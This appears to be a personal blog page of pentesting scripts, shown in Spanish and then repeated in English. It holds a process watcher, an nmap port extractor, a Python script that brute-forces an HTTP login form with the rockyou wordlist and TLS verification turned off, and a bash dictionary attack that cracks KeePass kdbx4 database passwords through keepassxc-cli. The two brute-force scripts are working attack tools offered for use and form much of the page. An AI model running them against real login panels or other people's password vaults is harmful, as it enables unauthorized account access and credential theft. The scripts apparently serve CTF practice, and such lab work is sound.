Pentesting-Scripts

Alejandro García Peláez

03-03-2023

Varias utilidades que he ido programando para distintos escenarios.

Watchproc


#!/bin/env bash

#========================================================#
# Author: Alejandro García Peláez
# Name: watchproc
# Description: Pequeño script en bash para detectar la 
# ejecución de procesos "temporales" (automatizados).
#========================================================#

# help panel
help(){
  echo -e "[!] Usage: "$0"[FILTER OPTIONS]\n\nFilters:\n"
  echo -e "-u, --user\t Filter processes according to a specific user\n"
  echo -e "-cmd, --command\t Filter the processes by specifying a part of the command\n"
}

# Ctrl+c or SIGINT trap
trap_handler(){
  rm *_proc
  echo -e "\n[>](watchproc) Exiting..."
  exit 0
}

# Checks if the value is empty
empty_value(){
  if [[ -z $1 ]]
  then
    help
    exit 1
  fi
}

# Assign the value for filtering
assign_value(){
  if [[ -z $FILTERS ]]
  then
    FILTERS=$1
  else
    FILTERS=$FILTERS".*"$1
  fi
}

# Obtain all processes for comparison
save_proc(){
  ps -eo pid,user,cmd --sort -pid | grep -E $FILTERS | grep -Ev "\[" | grep -Ev "$EXPRESSION" > $1
}

trap trap_handler SIGINT

EXPRESSION="grep|ps -eo pid,user,cmd"
FILTERS=""
ARGS=("$@")
for ((i=0; i<$# ; i=i+2))
do
  ARG=${ARGS[i]}
  VALUE=${ARGS[i+1]}

# The options are just to make it easier to understand what is being done,
# specifically is made for my machine guides.

  case $ARG in

    -u | --user)
      empty_value $VALUE
      assign_value $VALUE
      ;;

    -cmd | --command)
      empty_value $VALUE
      assign_value $VALUE
      ;;

    *)
      echo "[x] Unknown arg: "$ARG
      help
      exit 1
  esac
done

echo -e "[0](watchproc) Detecting process execution...\n"

save_proc current_proc

# Watch the processes

while [[ 1 -eq 1 ]]
do
  save_proc actual_proc
  # Compare
  RESULT=$(diff current_proc actual_proc)
  if [[ ! -z $RESULT ]]
  then
    echo $RESULT
    save_proc current_proc
  fi
done

grePorts


#!/bin/bash

##
## Author: Alejandro García Peláez
##
## Simple escript en bash para extraer mediante regex los puertos abiertos obtenidos por 
## nmap con el formato -oG y copiarlos al "portapapeles" (más conocida como "clipboard"). 
##
## Por ejemplo (usando TCP port scan por defecto, -sU para UDP):
##
## nmap -p- --open -T5 -n <ip> -oG openTCPports
## ./grePorts
## [!] Open ports: <port1>,<port2>...<portN>
##


if [ -f openTCPports ]; then

  ports=$(cat openTCPports | grep -oP Ports:.* \
  | grep -oP [0-9].*/ | grep -oP [0-9,] | \
  tr -d "\n")

  echo "[!] Open ports: $ports"
  echo -n $ports | xclip -sel clip
else
  echo "[x] The file 'openTCPports' dont exist"
  exit 1
fi

HTTPloginBruteforce


#!/bin/env python
# Author: 4rtic f0x
# [x] Usage => python3 login_bruteforce.py <username>
#
# Simple ataque de fuerza bruta via HTTP para un usuario conocido.

import sys, os, requests, pdb, signal, re
from pwn import *

### GLOBALS ###

URL="https://example.com/login.php"
WORDLIST="rockyou.txt"

def signal_handler(sig, frame):
    print('\n[!] Signal end...')
    sys.exit(1)

signal.signal(signal.SIGINT, signal_handler)

if __name__ == "__main__":
  user = sys.argv[1]
  cookies = {'cookies': 'cookies'}

  sentinel = 0
  progress_bar = log.progress("")

  with open(WORDLIST,"rb") as passfile:
    for password in passfile:
      sentinel += 1
      try:
        password = password.decode().strip()
        progress_bar.status('Bruteforce progress for %s [%s]: %s' % (user,sentinel,password))
        auth_data = {
            'username': user,
            'password': password
        }
        resp = requests.post(URL,verify=False, data=auth_data, cookies=cookies)
        # Verify to False for ssl self-signed certificate
        if not re.search("incorrect",resp.text):
          print("Username: %s : Password: %s" % (user,password))
          exit(0)

      except Exception as e:
        print("[x] Error on password: %s" % password)

Kdbx version 4 Bruteforce

#!/bin/bash

#================================================#
## Author: 4rtic f0x
## Name: kdbx4bf
## Description : Dado que keepass2john no soporta la version 4 de los archivos kdbx 
## este script actúa por fuerza bruta usando un diccionario para romper la contraseña y acceder a las 
## credenciales.
#================================================#

ARGS=$#

if [[ ARGS -ne 2 ]]; then
  echo "[x] Usage: kdbx4bf <kdbx file> <wordlist>"
fi


keepassxc-cli -h &> /dev/null
KEEPASS_INSTALLED=$?

if [[ KEEPASS_INSTALLED -ne 0 ]]; then
  echo "[x] There are problems with keepassxc-cli"
fi

SENTINEL=0
WORDS=$(cat $2 | wc -l)


for password in $(cat $2)
do

  clear
  echo "[!] Working ... "$SENTINEL"/"$WORDS
  RESULT=$(echo $password |
    keepassxc-cli open $1 2>&1 |
      grep -E "Error|Invalid")

  if [[ -z $(echo $RESULT) ]]; then
    echo "[!] Valid credential for "$1": "$password
    exit 0
  fi

  SENTINEL=$((SENTINEL + 1))

done

echo "[!] Finish => No valid credentials found"
exit 0

Several utilities that I have been programming for different scenarios.

watchproc


#!/bin/env bash

#========================================================#
# Author: Alejandro García Peláez
# Name: watchproc
# Description: Small script written in bash to detect the
#  execution of temporary processes.
#========================================================#

# help panel
help(){
  echo -e "[!] Usage: "$0"[FILTER OPTIONS]\n\nFilters:\n"
  echo -e "-u, --user\t Filter processes according to a specific user\n"
  echo -e "-cmd, --command\t Filter the processes by specifying a part of the command\n"
}

# Ctrl+c or SIGINT trap
trap_handler(){
  rm *_proc
  echo -e "\n[>](watchproc) Exiting..."
  exit 0
}

# Checks if the value is empty
empty_value(){
  if [[ -z $1 ]]
  then
    help
    exit 1
  fi
}

# Assign the value for filtering
assign_value(){
  if [[ -z $FILTERS ]]
  then
    FILTERS=$1
  else
    FILTERS=$FILTERS".*"$1
  fi
}

# Obtain all processes for comparison
save_proc(){
  ps -eo pid,user,cmd --sort -pid | grep -E $FILTERS | grep -Ev "\[" | grep -Ev "$EXPRESSION" > $1
}

trap trap_handler SIGINT

EXPRESSION="grep|ps -eo pid,user,cmd"
FILTERS=""
ARGS=("$@")
for ((i=0; i<$# ; i=i+2))
do
  ARG=${ARGS[i]}
  VALUE=${ARGS[i+1]}

# The options are just to make it easier to understand what is being done,
# specifically is made for my machine guides.

  case $ARG in

    -u | --user)
      empty_value $VALUE
      assign_value $VALUE
      ;;

    -cmd | --command)
      empty_value $VALUE
      assign_value $VALUE
      ;;

    *)
      echo "[x] Unknown arg: "$ARG
      help
      exit 1
  esac
done

echo -e "[0](watchproc) Detecting process execution...\n"

save_proc current_proc

# Watch the processes

while [[ 1 -eq 1 ]]
do
  save_proc actual_proc
  # Compare
  RESULT=$(diff current_proc actual_proc)
  if [[ ! -z $RESULT ]]
  then
    echo $RESULT
    save_proc current_proc
  fi
done

greports


#!/bin/bash

##
## Author: Alejandro García Peláez
##
## Simple bash script in order to extract the open ports from nmap -oG format 
##( and copy them in clipboard )
##
## For example (using TCP port scan by default, -sU for UDP):
##
## nmap -p- --open -T5 -n <ip> -oG openTCPports
## ./grePorts
## [!] Open ports: <port1>,<port2>...<portN>
##


if [ -f openTCPports ]; then

  ports=$(cat openTCPports | grep -oP Ports:.* \
  | grep -oP [0-9].*/ | grep -oP [0-9,] | \
  tr -d "\n")

  echo "[!] Open ports: $ports"
  echo -n $ports | xclip -sel clip
else
  echo "[x] The file 'openTCPports' dont exist"
  exit 1
fi

HTTPloginBruteForce


#!/bin/env python
# Author: 4rtic f0x
# [x] Usage => python3 login_bruteforce.py <username>
#
# Simple python script to brute-force attack a login panel from known user

import sys, os, requests, pdb, signal, re
from pwn import *

### GLOBALS ###

URL="https://example.com/login.php"
WORDLIST="rockyou.txt"

def signal_handler(sig, frame):
    print('\n[!] Signal end...')
    sys.exit(1)

signal.signal(signal.SIGINT, signal_handler)

if __name__ == "__main__":
  user = sys.argv[1]
  cookies = {'cookies': 'cookies'}

  sentinel = 0
  progress_bar = log.progress("")

  with open(WORDLIST,"rb") as passfile:
    for password in passfile:
      sentinel += 1
      try:
        password = password.decode().strip()
        progress_bar.status('Bruteforce progress for %s [%s]: %s' % (user,sentinel,password))
        auth_data = {
            'username': user,
            'password': password
        }
        resp = requests.post(URL,verify=False, data=auth_data, cookies=cookies)
        # Verify to False for ssl self-signed certificate
        if not re.search("incorrect",resp.text):
          print("Username: %s : Password: %s" % (user,password))
          exit(0)

      except Exception as e:
        print("[x] Error on password: %s" % password)

Kdbx 4 Bruteforce

#!/bin/bash

#================================================#
## Author: 4rtic f0x
## Name: kdbx4bf
## Description : Since keepass2john does not support version 4 of the kdbx 
##   files this script acts by brute force using a dictionary to break the password and gain access to the 
##   credentials. 
#================================================#

ARGS=$#

if [[ ARGS -ne 2 ]]; then
  echo "[x] Usage: kdbx4bf <kdbx file> <wordlist>"
fi


keepassxc-cli -h &> /dev/null
KEEPASS_INSTALLED=$?

if [[ KEEPASS_INSTALLED -ne 0 ]]; then
  echo "[x] There are problems with keepassxc-cli"
fi

SENTINEL=0
WORDS=$(cat $2 | wc -l)


for password in $(cat $2)
do

  clear
  echo "[!] Working ... "$SENTINEL"/"$WORDS
  RESULT=$(echo $password |
    keepassxc-cli open $1 2>&1 |
      grep -E "Error|Invalid")

  if [[ -z $(echo $RESULT) ]]; then
    echo "[!] Valid credential for "$1": "$password
    exit 0
  fi

  SENTINEL=$((SENTINEL + 1))

done

echo "[!] Finish => No valid credentials found"
exit 0